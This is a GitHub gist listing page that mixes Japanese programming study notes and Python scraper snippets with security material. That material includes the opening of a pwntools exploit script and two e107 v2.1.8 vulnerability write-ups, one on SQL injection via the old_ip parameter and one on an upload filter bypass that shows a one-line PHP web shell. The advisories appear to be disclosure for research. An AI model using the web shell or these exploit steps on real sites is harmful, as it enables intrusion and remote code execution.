プログラマが学ぶべき最も大切な技能は、コードを書かないですむときを見極めることかもしれない
- 不必要な機能を削除する。過剰な機能は持たせない
- 汎用的なユーティリティを作って使いまわす
- 定期的にすべてのAPIを読んで、標準ライブラリに慣れ親しんでおく
ommadawn46 ommadawn46
ommadawn46
/ readable_code_chap13.md
Last active
September 24, 2023 06:54
https://developer.mozilla.org/ja/docs/Web/JavaScript/Reference/Classes
- ECMAScript 6で追加された
- 昔はprototypeを利用してクラス的な振る舞いをするオブジェクトを作成することが多かったが、class構文を使えば簡単にクラスを扱うことができる
class Polygon { constructor(height, width) { this.height = height;
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| import sys | |
| username_addr = 0x6020C0 | |
| password_addr = 0x6020E0 | |
| call_printf_addr = 0x04009B6 | |
| pop_rdi = 0x0000000000400B03 # pop rdi ; ret | |
| with open("username_payload", "wb") as f: |
ommadawn46
/ GPEN学習メモ.md
Created
March 28, 2019 17:10
ommadawn46
/ cto_challenge_level3.py
Last active
December 3, 2018 09:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from html.parser import HTMLParser | |
| from urllib.request import urlopen | |
| from datetime import datetime | |
| import json | |
| import csv | |
| import sys | |
| import re | |
| import os | |
| # エラーログのパス |
ommadawn46
/ cto_challenge_level2.py
Last active
December 3, 2018 09:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from html.parser import HTMLParser | |
| from urllib.request import urlopen | |
| from datetime import datetime | |
| import json | |
| import csv | |
| import sys | |
| import re | |
| # エラーログのパス | |
| ERRORLOG = 'error.log' |
ommadawn46
/ cto_challenge_level1.py
Created
June 7, 2016 07:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import json | |
| def convertToStr(data): | |
| if type(data) is unicode: | |
| data = data.encode('utf-8') | |
| elif not type(data) is str: | |
| data = str(data) | |
| return data | |
| def writerow(f, cols): |
ommadawn46
/ e107_v2.1.8_Banlist_SQL_Injection.md
Last active
September 7, 2018 10:45
e107 v2.1.8 Banlist SQL Injection
e107 v2.1.8 contains a flaw that may allow carrying out an SQL injection attack. The issue is due to the /e107_admin/banlist.php script not properly escaping input to the old_ip parameter. This may allow a remote attacker to inject or manipulate SQL queries in the database, allowing for the manipulation or disclosure of arbitrary data.
- Login to the admin page. (
/e107_admin/admin.php) - Send a POST request to
/e107_admin/banlist.phpand use BurpSuite to rewrite parameters as follows.
POST /e107/e107_admin/banlist.php HTTP/1.1
Host: localhost:8080
ommadawn46
/ e107_v2.1.8_MediaManager_bypass_filetype_check.md
Last active
September 7, 2018 10:45
e107 v2.1.8 MediaManager bypass filetype check
MediaManager of e107 v2.1.8 contains a flaw that is triggered as file types and extensions for uploaded files are not properly validated before being placed in a user-accessible path. This may allow a remote attacker to upload a file and then request it in order to execute arbitrary code with the privileges of the web service.
-
Login to the admin page (
/e107_admin/admin.php) and access MediaManager. -
Make a backdoor PHP file named "backdoor.jpg" to bypass JavaScript filter and select it on MediaManeger.
<?php system($_GET['q']) ?>
ommadawn46
/ readable_code_chap9.md
Last active
June 26, 2018 12:10
NewerOlder